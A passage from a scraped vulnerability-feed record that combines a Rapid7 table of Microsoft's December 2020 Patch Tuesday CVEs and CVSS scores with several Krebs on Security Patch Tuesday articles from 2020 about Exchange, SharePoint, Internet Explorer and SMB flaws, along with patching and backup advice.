Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-16964](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16964>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-17098](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17098>) | Windows GDI+ Information Disclosure Vulnerability | False | False | 5.5 | True \n \n### Exchange Server Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17132](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17132>) | Microsoft Exchange Remote Code Execution Vulnerability | False | False | 9.1 | True \n[CVE-2020-17142](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17142>) | Microsoft Exchange Remote Code Execution Vulnerability | False | False | 9.1 | True \n[CVE-2020-17143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17143>) | Microsoft Exchange Information Disclosure Vulnerability | False | False | 8.8 | True \n[CVE-2020-17141](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17141>) | Microsoft Exchange Remote Code Execution Vulnerability | False | False | 8.4 | True \n[CVE-2020-17144](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17144>) | Microsoft Exchange Remote Code Execution Vulnerability | False | False | 8.4 | True \n[CVE-2020-17117](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17117>) | Microsoft Exchange Remote Code Execution Vulnerability | False | False | 6.6 | False \n \n### Microsoft Dynamics Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17152](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17152>) | Microsoft Dynamics 365 for Finance and Operations (on-premises) Remote Code Execution Vulnerability | False | False | 8.8 | True \n[CVE-2020-17158](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17158>) | Microsoft Dynamics 365 for Finance and Operations (on-premises) Remote Code Execution Vulnerability | False | False | 8.8 | True \n[CVE-2020-17147](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17147>) | Dynamics CRM Webclient Cross-site Scripting Vulnerability | False | False | 8.7 | True \n[CVE-2020-17133](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17133>) | Microsoft Dynamics Business Central/NAV Information Disclosure | False | False | 6.5 | True \n \n### Microsoft Office Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17121](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17121>) | Microsoft SharePoint Remote Code Execution Vulnerability | False | False | 8.8 | True \n[CVE-2020-17118](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17118>) | Microsoft SharePoint Remote Code Execution Vulnerability | False | False | 8.1 | False \n[CVE-2020-17115](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17115>) | Microsoft SharePoint Spoofing Vulnerability | False | False | 8 | True \n[CVE-2020-17122](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17122>) | Microsoft Excel Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17123](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17123>) | Microsoft Excel Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17124](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17124>) | Microsoft PowerPoint Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17125](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17125>) | Microsoft Excel Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17127](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17127>) | Microsoft Excel Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17128](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17128>) | Microsoft Excel Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17129](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17129>) | Microsoft Excel Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17089](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17089>) | Microsoft SharePoint Elevation of Privilege Vulnerability | False | False | 7.1 | False \n[CVE-2020-17119](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17119>) | Microsoft Outlook Information Disclosure Vulnerability | False | False | 6.5 | True \n[CVE-2020-17130](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17130>) | Microsoft Excel Security Feature Bypass Vulnerability | False | False | 6.5 | True \n[CVE-2020-17126](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17126>) | Microsoft Excel Information Disclosure Vulnerability | False | False | 5.5 | True \n[CVE-2020-17120](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17120>) | Microsoft SharePoint Information Disclosure Vulnerability | False | False | 5.3 | True \n \n### Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17095](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17095>) | Hyper-V Remote Code Execution Vulnerability | False | False | 8.5 | True \n[CVE-2020-17092](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17092>) | Windows Network Connections Service Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-17134](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17134>) | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-17136](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17136>) | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-17137](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17137>) | DirectX Graphics Kernel Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-17139](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17139>) | Windows Overlay Filter Security Feature Bypass Vulnerability | False | False | 7.8 | False \n[CVE-2020-17096](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17096>) | Windows NTFS Remote Code Execution Vulnerability | False | False | 7.5 | True \n[CVE-2020-17103](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17103>) | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | False | False | 7 | False \n[CVE-2020-17099](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17099>) | Windows Lock Screen Security Feature Bypass Vulnerability | False | False | 6.8 | True \n[CVE-2020-16996](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16996>) | Kerberos Security Feature Bypass Vulnerability | False | False | 6.5 | True \n[CVE-2020-17094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17094>) | Windows Error Reporting Information Disclosure Vulnerability | False | False | 5.5 | True \n[CVE-2020-17138](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17138>) | Windows Error Reporting Information Disclosure Vulnerability | False | False | 5.5 | True \n[CVE-2020-17097](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17097>) | Windows Digital Media Receiver Elevation of Privilege Vulnerability | False | False | 3.3 | False \n \n## Summary Graphs\n\n![Patch Tuesday - December 2020](https://blog.rapid7.com/content/images/2020/12/output_18_2.png)![Patch Tuesday - December 2020](https://blog.rapid7.com/content/images/2020/12/output_20_2.png)![Patch Tuesday - December 2020](https://blog.rapid7.com/content/images/2020/12/output_25_1.png)![Patch Tuesday - December 2020](https://blog.rapid7.com/content/images/2020/12/output_26_1.png)", "cvss3": {}, "published": "2020-12-08T21:36:27", "type": "rapid7blog", "title": "Patch Tuesday - December 2020", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-16875", "CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964", "CVE-2020-16971", "CVE-2020-16996", "CVE-2020-17002", "CVE-2020-17089", "CVE-2020-17092", "CVE-2020-17094", "CVE-2020-17095", "CVE-2020-17096", "CVE-2020-17097", "CVE-2020-17098", "CVE-2020-17099", "CVE-2020-17103", "CVE-2020-17115", "CVE-2020-17117", "CVE-2020-17118", "CVE-2020-17119", "CVE-2020-17120", "CVE-2020-17121", "CVE-2020-17122", "CVE-2020-17123", "CVE-2020-17124", "CVE-2020-17125", "CVE-2020-17126", "CVE-2020-17127", "CVE-2020-17128", "CVE-2020-17129", "CVE-2020-17130", "CVE-2020-17131", "CVE-2020-17132", "CVE-2020-17133", "CVE-2020-17134", "CVE-2020-17135", "CVE-2020-17136", "CVE-2020-17137", "CVE-2020-17138", "CVE-2020-17139", "CVE-2020-17140", "CVE-2020-17141", "CVE-2020-17142", "CVE-2020-17143", "CVE-2020-17144", "CVE-2020-17145", "CVE-2020-17147", "CVE-2020-17148", "CVE-2020-17150", "CVE-2020-17152", "CVE-2020-17153", "CVE-2020-17156", "CVE-2020-17158", "CVE-2020-17159", "CVE-2020-17160"], "modified": "2020-12-08T21:36:27", "id": "RAPID7BLOG:99D9180FBF3F900ADB0CDC5EF79EC080", "href": "https://blog.rapid7.com/2020/12/08/patch-tuesday-december-2020/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "krebs": [{"lastseen": "2020-09-08T21:40:55", "description": "**Microsoft **today released updates to remedy nearly 130 security vulnerabilities in its** Windows** operating system and supported software. None of the flaws are known to be currently under active exploitation, but 23 of them could be exploited by malware or malcontents to seize complete control of Windows computers with little or no help from users.\n\n![](https://krebsonsecurity.com/wp-content/uploads/2020/08/windowsec.png)\n\nThe majority of the most dangerous or "critical" bugs deal with issues in Microsoft's various Windows operating systems and its web browsers, **Internet Explorer** and **Edge**. September marks the seventh month in a row Microsoft has shipped fixes for more than 100 flaws in its products, and the fourth month in a row that it fixed more than 120.\n\nAmong the chief concerns for enterprises this month is [CVE-2020-16875](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16875>), which involves a critical flaw in the email software **Microsoft Exchange Server 2016 and 2019. **An attacker could leverage the Exchange bug to run code of his choosing just by sending a booby-trapped email to a vulnerable Exchange server.\n\n"That doesn\u2019t quite make it wormable, but it\u2019s about the worst-case scenario for Exchange servers," said **Dustin Childs**, of **Trend Micro's Zero Day Initiative**. "We have seen the previously patched Exchange bug [CVE-2020-0688](<https://krebsonsecurity.com/2020/03/microsoft-patch-tuesday-march-2020-edition/>) used in the wild, and that requires authentication. We\u2019ll likely see this one in the wild soon. This should be your top priority."\n\nAlso not great for companies to have around is [CVE-2020-1210](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1210>), which is a remote code execution flaw in supported versions of **Microsoft Sharepoint** document management software that bad guys could attack by uploading a file to a vulnerable Sharepoint site. Security firm **Tenable** notes that this bug is reminiscent of [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>), another Sharepoint problem that's been exploited for cybercriminal gains since April 2019.\n\nMicrosoft fixed at least five other serious bugs in Sharepoint versions 2010 through 2019 that also could be used to compromise systems running this software. And because ransomware purveyors have a history of seizing upon Sharepoint flaws to wreak havoc inside enterprises, companies should definitely prioritize deployment of these fixes, says **Alan Liska**, senior security architect at **Recorded Future**.\n\n**Todd Schell** at **Ivanti** reminds us that Patch Tuesday isn't just about Windows updates: Google has shipped a critical update for its Chrome browser that resolves at least five security flaws that are rated high severity. If you use Chrome and notice an icon featuring a small upward-facing arrow inside of a circle to the right of the address bar, it's time to update. Completely closing out Chrome and restarting it should apply the pending updates.\n\nOnce again, there are no security updates available today for **Adobe's Flash Player**, although the company did ship a non-security software update for the browser plugin. The last time Flash got a security update was June 2020, which may suggest researchers and/or attackers have stopped looking for flaws in it. Adobe says it will retire the plugin at the end of this year, and Microsoft has said it plans to completely remove the program from all Microsoft browsers via Windows Update by then.\n\nBefore you update with this month\u2019s patch batch, please make sure you have backed up your system and/or important files. It\u2019s not uncommon for Windows updates to hose one\u2019s system or prevent it from booting properly, and some updates even have known to erase or corrupt files.\n\nSo do yourself a favor and backup _before_ installing any patches. Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAnd if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see [this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nAs always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-09-08T21:33:26", "type": "krebs", "title": "Microsoft Patch Tuesday, Sept. 2020 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604", "CVE-2020-0688", "CVE-2020-1210", "CVE-2020-16875"], "modified": "2020-09-08T21:33:26", "id": "KREBS:DF8493DA16F49CE6247436830678BA8D", "href": "https://krebsonsecurity.com/2020/09/microsoft-patch-tuesday-sept-2020-edition/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T19:36:23", "description": "**Microsoft Corp.** today released updates to plug more than 100 security holes in its various **Windows** operating systems and associated software. If you (ab)use Windows, please take a moment to read this post, backup your system(s), and patch your PCs.\n\nAll told![](https://krebsonsecurity.com/wp-content/uploads/2014/07/brokenwindows.png), this patch batch addresses at least 115 security flaws. Twenty-six of those earned Microsoft's most-dire \"critical\" rating, meaning malware or miscreants could exploit them to gain complete, remote control over vulnerable computers without any help from users.\n\nGiven the sheer number of fixes, mercifully there are no [zero-day bugs](<https://en.wikipedia.org/wiki/Zero-day_\$computing\$>) to address, nor were any of them detailed publicly prior to today. Also, there were no security patches released by **Adobe** today. But there are a few eyebrow-raising Windows vulnerabilities worthy of attention.\n\n**Recorded Future** warns exploit code is now available for one of the critical bugs Redmond patched last month in **Microsoft Exchange** ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)), and that nation state actors have been observed abusing the exploit for targeted attacks.\n\nOne flaw fixed this month in **Microsoft Word** ([CVE-2020-0852](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0852>)) could be exploited to execute malicious code on a Windows system just by getting the user to load an email containing a booby-trapped document in the **Microsoft Outlook** preview pane. CVE-2020-0852 is one just four remote execution flaws Microsoft patched this month in versions of Word.\n\nOne somewhat ironic weakness fixed today ([CVE-2020-0872](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0872>)) resides in a new component Microsoft debuted this year called [Application Inspector](<https://www.microsoft.com/security/blog/2020/01/16/introducing-microsoft-application-inspector/>), a source code analyzer designed to help Windows developers identify \"interesting\" or risky features in open source software (such as the use of cryptography, connections made to a remote entity, etc).\n\nMicrosoft said this flaw can be exploited if a user runs Application Inspector on a hacked or booby-trapped program. Whoops. **Animesh Jain** from security vendor **Qualys** [says](<https://blog.qualys.com/laws-of-vulnerabilities/2020/03/10/march-2020-patch-tuesday-115-vulns-26-critical-microsoft-word-and-workstation-patches>) this patch should be prioritized, despite being labeled as less severe (\"important\" versus \"critical\") by Microsoft.\n\nFor enterprises, Qualys recommends prioritizing the patching of desktop endpoints over servers this month, noting that most of the other critical bugs patched today are prevalent on workstation-type devices. Those include a number of flaws that can be exploited simply by convincing a Windows user to browse to a malicious or hacked Web site.\n\nWhile many of the vulnerabilities fixed in today's patch batch affect Windows 7 operating systems, this OS is no longer being supported with security updates (unless you\u2019re an enterprise taking advantage of Microsoft\u2019s [paid extended security updates program](<https://support.microsoft.com/en-us/help/4527878/faq-about-extended-security-updates-for-windows-7>), which is available to Windows 7 Professional and Windows 7 enterprise users).\n\nIf you rely on Windows 7 for day-to-day use, it\u2019s probably time to think about upgrading to something newer. That might be a computer with Windows 10. Or maybe you have always wanted that shiny MacOS computer.\n\nIf cost is a primary motivator and the user you have in mind doesn\u2019t do much with the system other than browsing the Web, perhaps a **Chromebook** or an older machine with a recent version of **Linux** is the answer (Ubuntu may be easiest for non-Linux natives). Whichever system you choose, it\u2019s important to pick one that fits the owner\u2019s needs and provides security updates on an ongoing basis.\n\nKeep in mind that while staying up-to-date on Windows patches is a must, it\u2019s important to make sure you\u2019re updating only after you\u2019ve backed up your important data and files. A reliable backup means you\u2019re not losing your mind when the odd buggy patch causes problems booting the system.\n\nSo do yourself a favor and backup your files before installing any patches. Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAs always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips. Also, keep an eye on the [AskWoody blog](<https://www.askwoody.com/2020/february-2020-patch-tuesday-foibles/>) from **Woody Leonhard**, who keeps a close eye on buggy Microsoft updates each month.\n\n**Update, 7:50 p.m.:** Microsoft has released [an advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005>) about a remote code execution vulnerability in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. Critical SMB (Windows file-sharing) flaws are dangerous because they are typically \"wormable,\" in that they can spread rapidly to vulnerable systems across an internal network with little to no human interaction.\n\n\"To exploit the vulnerability against an SMB Server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 Server,\" Microsoft warned. \"To exploit the vulnerability against an SMB Client, an unauthenticated attacker would need to configure a malicious SMBv3 Server and convince a user to connect to it.\"\n\nMicrosoft's advisory says the flaw is neither publicly disclosed nor exploited at the moment. It includes a workaround to mitigate the flaw in file-sharing servers, but says the workaround does not prevent the exploitation of clients.", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-10T23:44:29", "type": "krebs", "title": "Microsoft Patch Tuesday, March 2020 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688", "CVE-2020-0852", "CVE-2020-0872"], "modified": "2020-03-10T23:44:29", "id": "KREBS:9D9C58DB5C5495B10D2EBDB92549B0F2", "href": "https://krebsonsecurity.com/2020/03/microsoft-patch-tuesday-march-2020-edition/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-24T10:28:18", "description": "**Adobe** and **Microsoft** each issued a bevy of updates today to plug critical security holes in their software. Microsoft's release includes fixes for 112 separate flaws, including one zero-day vulnerability that is already being exploited to attack Windows users. Microsoft also is taking flak for changing its security advisories and limiting the amount of information disclosed about each bug.\n\n![](https://krebsonsecurity.com/wp-content/uploads/2020/08/windowsec.png)\n\nSome 17 of the 112 issues fixed in today's patch batch involve "critical" problems in Windows, or those that can be exploited by malware or malcontents to seize complete, remote control over a vulnerable Windows computer without any help from users.\n\nMost of the rest were assigned the rating "important," which [in Redmond parlance](<https://www.microsoft.com/en-us/msrc/security-update-severity-rating-system>) refers to a vulnerability whose exploitation could "compromise the confidentiality, integrity, or availability of user data, or of the integrity or availability of processing resources."\n\nA chief concern among all these updates this month is [CVE-2020-17087](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17087>), which is an "important" bug in the Windows kernel that is already seeing active exploitation. CVE-2020-17087 is not listed as critical because it's what's known as a privilege escalation flaw that would allow an attacker who has already compromised a less powerful user account on a system to gain administrative control. In essence, it would have to be chained with another exploit.\n\nUnfortunately, this is exactly what Google researchers described witnessing recently. On Oct. 20, **Google** released an update for its **Chrome** browser which fixed a bug ([CVE-2020-15999](<https://nvd.nist.gov/vuln/detail/CVE-2020-15999>)) that was seen being used in conjunction with CVE-2020-17087 to compromise Windows users.\n\nIf you take a look at the advisory Microsoft released today for CVE-2020-17087 (or any others from today's batch), you might notice they look a bit more sparse. That's because Microsoft has opted to restructure those advisories around the [Common Vulnerability Scoring System](<https://nvd.nist.gov/vuln-metrics/cvss>) (CVSS) format to more closely align the format of the advisories with that of other major software vendors.\n\nBut in so doing, Microsoft has also removed some useful information, such as the description explaining in broad terms the scope of the vulnerability, how it can be exploited, and what the result of the exploitation might be. Microsoft explained its reasoning behind this shift in [a blog post](<https://msrc-blog.microsoft.com/2020/11/09/vulnerability-descriptions-in-the-new-version-of-the-security-update-guide/>).\n\nNot everyone is happy with the new format. **Bob Huber**, chief security officer at [Tenable](<https://www.tenable.com>), praised Microsoft for adopting an industry standard, but said the company should consider that folks who review Patch Tuesday releases aren\u2019t security practitioners but rather IT counterparts responsible for actually applying the updates who often aren\u2019t able (and shouldn\u2019t have to) decipher raw CVSS data.\n\n"With this new format, end users are completely blind to how a particular CVE impacts them," Huber said. "What\u2019s more, this makes it nearly impossible to determine the urgency of a given patch. It\u2019s difficult to understand the benefits to end-users. However, it\u2019s not too difficult to see how this new format benefits bad actors. They\u2019ll reverse engineer the patches and, by Microsoft not being explicit about vulnerability details, the advantage goes to attackers, not defenders. Without the proper context for these CVEs, it becomes increasingly difficult for defenders to prioritize their remediation efforts."\n\n**Dustin Childs **with **Trend Micro**'s [Zero Day Initiative](<https://www.zerodayinitiative.com/>) also puzzled over the lack of details included in Microsoft advisories tied to two other flaws fixed today -- including one in **Microsoft Exchange Server **([CVE-2020-16875](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16875>)) and [CVE-2020-17051](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17051>), which is a scary-looking weakness in the **Windows Network File System (NFS)**.\n\nThe Exchange problem, Childs said, was reported by the winner of the [Pwn2Own Miami bug finding contest](<https://www.thezdi.com/blog/2020/1/21/pwn2own-miami-2020-schedule-and-live-results>).\n\n"With no details provided by Microsoft, we can only assume this is the bypass of CVE-2020-16875 he had previously mentioned," Childs said. "It is very likely he will publish the details of these bugs soon. Microsoft rates this as important, but I would treat it as critical, especially since people seem to find it hard to patch Exchange at all."\n\nLikewise, with CVE-2020-17051, there was a noticeable lack of detail for bug that earned a CVSS score of 9.8 (10 is the most dangerous).\n\n"With no description to work from, we need to rely on the CVSS to provide clues about the real risk from the bug," Childs said. "Considering this is listed as no user interaction with low attack complexity, and considering NFS is a network service, you should treat this as wormable until we learn otherwise."\n\nSeparately, Adobe today released updates to plug at least 14 security holes in Adobe Acrobat and Reader. Details about those fixes are available [here](<https://helpx.adobe.com/security/products/acrobat/apsb20-67.html>). There are no security updates for Adobe's Flash Player, which Adobe has said will be retired at the end of the year. Microsoft, which has bundled versions of Flash with its Web browsers, says it plans to ship an update in December that will remove Flash from Windows PCs, and last month it made the removal tool [available for download](<https://support.microsoft.com/en-us/help/4577586/update-for-removal-of-adobe-flash-player>).\n\nWindows 10 users should be aware that the operating system will download updates and install them on its own schedule, closing out active programs and rebooting the system. If you wish to ensure Windows has been set to pause updating so you can back up your files and/or system, see [this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nBut please do back up your system before applying any of these updates. Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAs always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-11T01:56:41", "type": "krebs", "title": "Patch Tuesday, November 2020 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999", "CVE-2020-16875", "CVE-2020-17051", "CVE-2020-17087"], "modified": "2020-11-11T01:56:41", "id": "KREBS:613A537780BD40A6F8E0047CE8D3E6EC", "href": "https://krebsonsecurity.com/2020/11/patch-tuesday-november-2020-edition/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-11T23:39:14", "description": "**Microsoft** today released updates to plug nearly 100 security holes in various versions of its **Windows** operating system and related software, including a zero-day vulnerability in **Internet Explorer** (IE) that is actively being exploited. Also, **Adobe** has issued a bevy of security updates for its various products, including **Flash Player** and **Adobe Reader/Acrobat**.\n\n![](https://krebsonsecurity.com/wp-content/uploads/2014/07/brokenwindows.png)A dozen of the vulnerabilities Microsoft patched today are rated \"critical,\" meaning malware or miscreants could exploit them remotely to gain complete control over an affected system with little to no help from the user.\n\nLast month, Microsoft released an advisory warning that attackers were exploiting a previously unknown flaw in IE. That vulnerability, assigned as [CVE-2020-0674](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0674>), has been patched with this month's release. It could be used to install malware just by getting a user to browse to a malicious or hacked Web site.\n\nMicrosoft once again fixed a critical flaw in the way Windows handles shortcut (.lnk) files ([CVE-2020-0729](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0729>)) that affects **Windows 8** and **10** systems, as well as **Windows Server 2008-2012**. **Allan Liska**, intelligence analyst at **Recorded Future**, says Microsoft considers exploitation of the vulnerability unlikely, but that a similar vulnerability discovered last year, [CVE-2019-1280](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1280>), was being actively exploited by the [Astaroth trojan](<https://www.cyber.nj.gov/threat-profiles/trojan-variants/astaroth>) as recently as September.\n\nAnother flaw fixed this month in **Microsoft Exchange 2010** through **2019** may merit special attention. The bug could allow attackers to exploit the Exchange Server and execute arbitrary code just by sending a specially crafted email. This vulnerability ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)) is rated \"important\" rather than \"critical,\" but Liska says it seems potentially dangerous, as Microsoft identifies this as a vulnerability that is likely to be exploited.\n\nIn addition, Redmond addressed a critical issue ([CVE-2020-0618](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0618>)) in the way **Microsoft SQL Server** versions 2012-2016 handle page requests.\n\nAfter a several-month respite from patches for 